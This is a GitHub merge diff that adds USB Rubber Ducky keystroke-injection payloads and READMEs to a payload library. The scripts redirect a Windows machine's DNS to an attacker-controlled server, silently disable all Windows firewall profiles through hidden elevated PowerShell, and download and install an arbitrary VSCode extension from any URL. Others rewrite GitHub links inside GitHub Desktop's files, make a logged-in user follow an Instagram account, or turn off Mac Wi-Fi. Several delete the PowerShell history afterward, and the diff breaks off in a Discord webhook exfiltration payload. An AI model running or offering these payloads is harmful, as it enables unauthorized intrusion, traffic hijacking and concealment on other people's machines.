Merge 63d74b3807 into 3333420b26

Deactivate/Disable Windows Firewall

payloads/library/execution/DNS_spoofer/README.md

@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/DNS_spoofer/payload.txt

@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/execution/Disable_WiFi-MacOS/README.md

@@ -0,0 +1,24 @@
+# Disable WiFi 🛜
+
+This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
+
+### Details
+
+- **Title**: Disable WiFi
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Execution
+- **Target**: MacOS
+
+### Dependencies
+
+- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+   `DEFINE #MODE off`
+
+## How It Works 📜
+
+1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Run or stop the WiFi

payloads/library/execution/Disable_WiFi-MacOS/payload.txt

@@ -0,0 +1,53 @@
+REM_BLOCK
+##################################
+#                                #
+# Title        : Disable WiFi    #
+# Author       : bst04 - Aleff   #
+# Version      : 1.0             #
+# Category     : Execution       #
+# Target       : MacOS           #
+#                                #
+##################################
+END_REM
+
+REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+DEFINE #MODE off
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 250
+STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
+DELAY 250
+GUI q

payloads/library/execution/Firewall_Deactivator/README.md

@@ -0,0 +1,23 @@
+# Firewall Deactivator - Windows ✅
+
+Deactivate firewall on windows
+
+## Description
+
+A payload used to deactivate all firewalls on windows in a discrete manner.
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Firewall_Deactivator/payload.txt

@@ -0,0 +1,61 @@
+REM Title:        Firewall deactivator
+REM Author:       luu176
+REM Description:  Deactivate all firewalls in windows machine using hidden powershell
+REM Target:       Windows
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 200
+STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
+DELAY 800
+ALT y
+SAVE_HOST_KEYBOARD_LOCK_STATE
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/execution/Follow_Someone_On_Instagram/README.md

@@ -0,0 +1,50 @@
+# Follow someone on Instagram
+
+This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.
+
+Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.
+
+**Category**: Execution
+
+## Note
+
+Tested on:
+- Windows 11 Eng
+- Firefox Browser Eng
+
+## Dependencies
+
+* Internet Connection
+* Instagram account logged in
+
+## Settings
+
+- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
+
+    `[18] DEFINE #INSTAGRAM_LINK example`
+
+- It depends by the computer power and by the internet connection power
+
+    `[72] DELAY 2000`
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Follow_Someone_On_Instagram/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+################################################
+#                                              #
+# Title        : Follow someone on Instagram   #
+# Author       : Aleff                         #
+# Version      : 1.0                           #
+# Category     : Execution                     #
+# Target       : Windows 10/11                 #
+#                                              #
+################################################
+END_REM
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Instagram account logged in
+
+REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
+DEFINE #INSTAGRAM_LINK example
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+
+GUI r
+DELAY 500
+STRINGLN powershell
+DELAY 2000
+
+STRINGLN Start-Process "#INSTAGRAM_LINK"; exit;
+REM It depends by the computer power and by the internet connection power
+DELAY 2000
+
+REM Go to Follow button and click it
+REPEAT 12 TAB
+DELAY 500
+ENTER
+DELAY 1000
+
+REM Close the Browser
+ALT F4

payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md

@@ -0,0 +1,98 @@
+# Install Any Arbitrary VSCode Extension
+
+This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
+
+1. Removes any pre-existing version of the extension (if applicable).
+2. Downloads a ZIP archive of a VSCode extension.
+3. Extracts the extension to the correct VSCode extensions folder.
+
+The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
+
+## First Of All!
+
+Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
+
+So...
+- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
+- Always check the source and source code before doing this
+- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
+
+## Features
+
+- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
+- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
+- Removes any previous version of the extension.
+- Completely automated, requiring no manual intervention once the script is executed.
+
+## Requirements
+
+- **Target OS**: Windows 10/11
+- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
+- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
+- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
+
+## Usage
+
+### DuckyScript Configuration
+
+Before running the script, make sure to configure the following two variables in the script:
+
+1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
+    ```plaintext
+    DEFINE #EXTENSION_NAME example
+    ```
+   Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
+
+2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
+    ```plaintext
+    DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
+    ```
+
+### PowerShell Commands Breakdown
+
+- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
+    ```powershell
+    $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    if (Test-Path -Path $extensionsPath -PathType Container) {
+        Remove-Item -Recurse -Force -Path $extensionsPath
+    }
+    ```
+
+- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
+    ```powershell
+    $url = "#ARCHIVE_LINK"
+    $downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
+    $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    Invoke-WebRequest -Uri $url -OutFile $downloadPath
+    if (Test-Path -Path $downloadPath) {
+        Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
+        Remove-Item -Path $downloadPath -Force
+    }
+    ```
+  
+## Notes
+- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
+- Make sure that PowerShell is available on the target machine.
+- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt

@@ -0,0 +1,88 @@
+REM_BLOCK
+##########################################################
+#                                                        #
+# Title        : Install Any Arbitrary VSCode Extension  #
+# Author       : Aleff                                   #
+# Version      : 1.0                                     #
+# Category     : Execution                               #
+# Target       : Windows 10                              #
+#                                                        #
+##########################################################
+END_REM
+
+REM Replace "example" with the name of the extension folder
+DEFINE #EXTENSION_NAME example
+
+REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
+DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN_POWERSHELL
+    $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+
+    if (Test-Path -Path $extensionsPath -PathType Container) {
+        Remove-Item -Recurse -Force -Path $extensionsPath
+    }
+END_STRINGLN
+
+REM May it depends by the extension...
+DELAY 2000
+
+STRINGLN_POWERSHELL
+    $url = "#ARCHIVE_LINK"
+    $downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
+    $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    Invoke-WebRequest -Uri $url -OutFile $downloadPath
+    if (Test-Path -Path $downloadPath) {
+        Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
+        Remove-Item -Path $downloadPath -Force
+        Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+    }
+END_STRINGLN

payloads/library/execution/Install_Official_VSCode_Extension/README.md

@@ -0,0 +1,55 @@
+# Install Official VSCode Extension
+
+This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
+
+## First Of All!
+
+Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
+
+So...
+- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
+- Always check the source and source code before doing this
+- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
+
+## Features
+
+- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
+- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
+- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
+- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
+
+## Usage
+
+### Required Parameter
+
+- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
+
+## Requirements
+
+- **Operating System**: Windows 10 or 11
+- **PowerShell**
+- **Visual Studio Code**
+- **Internet**
+- **Permissions to execute commands in PowerShell**
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Install_Official_VSCode_Extension/payload.txt

@@ -0,0 +1,64 @@
+REM_BLOCK
+#####################################################
+#                                                   #
+# Title        : Install Official VSCode Extension  #
+# Author       : Aleff                              #
+# Version      : 1.0                                #
+# Category     : Execution                          #
+# Target       : Windows 10/11                      #
+#                                                   #
+#####################################################
+END_REM
+
+REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
+DEFINE #EXTENSION publisher.extensionName
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

payloads/library/execution/Replace_Links_In_GithubDesktop/README.md

@@ -0,0 +1,69 @@
+# Replace Links In GithubDesktop
+
+This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
+
+![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
+
+## Table of Contents
+
+- [Features](#features)
+- [Prerequisites](#prerequisites)
+- [Usage](#usage)
+- [Credits](#credits)
+
+## Features
+
+This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
+
+1. Detects the installation folder of GitHub Desktop.
+2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
+3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
+
+The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
+
+## Prerequisites
+
+- **Windows 10/11**
+- **GitHub Desktop** installed on the machine.
+
+## Usage
+
+1. **Modify the script**:
+   - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
+     ```duckyscript
+     DEFINE #NEW_LINK example.com
+     ```
+
+2. **Customization**:
+   - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
+     ```ducky
+     DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+     ```
+
+3. **Execution**:
+   - Upon execution, the script will:
+     - Open PowerShell.
+     - Detect the GitHub Desktop installation directory.
+     - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt

@@ -0,0 +1,109 @@
+REM_BLOCK
+#####################################################
+#                                                   #
+# Title        : Replace Links In GithubDesktop     #
+# Author       : Aleff                              #
+# Version      : 1.0                                #
+# Category     : Execution                          #
+# Target       : Windows 10/11                      #
+#                                                   #
+#####################################################
+END_REM
+
+
+REM REQUIRED - Define here the new url that will replace the original github link
+DEFINE #NEW_LINK example.com
+
+REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
+DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+
+
+REM_BLOCK
+    Credits:    Hak5 LLC
+    Website:    https://hak5.org/
+    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN_POWERSHELL
+    $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
+
+    $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
+
+    $versions = $folders | ForEach-Object {
+        [PSCustomObject]@{
+            FolderName = $_.Name
+            Version = [version]($_.Name -replace "app-", "")
+        }
+    }
+
+    $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
+
+    $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
+    $latestFolderPath += "\resources\app\"
+    $renderer = "renderer.js"
+    $main = "main.js"
+
+    $filePath = "$latestFolderPath$renderer"
+
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
+    $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
+    Set-Content -Path $filePath -Value $modifiedContent
+
+
+    $filePath = "$latestFolderPath$main"
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
+    $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
+    Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+
+END_STRINGLN

payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt

@@ -1,25 +1,69 @@
-REM ###############################################################
-REM #                                                             |
-REM # Title        : Create And Exfiltrate A Webhook Of Discord   |
-REM # Author       : Aleff                                        |
-REM # Version      : 1.0                                          |
-REM # Category     : Exfiltration                                 |
-REM # Target       : Windows 10-11                                |
-REM #                                                             |
-REM ###############################################################
+REM_BLOCK
+###############################################################
+#                                                             #
+# Title        : Create And Exfiltrate A Webhook Of Discord   #
+# Author       : Aleff                                        #
+# Version      : 1.0                                          #
+# Category     : Exfiltration                                 #
+# Target       : Windows 10-11                                #
+#                                                             #
+###############################################################
+END_REM
 
 
 REM Requirements:
 REM     - Internet connection
 REM     - Discord Installed
 
-
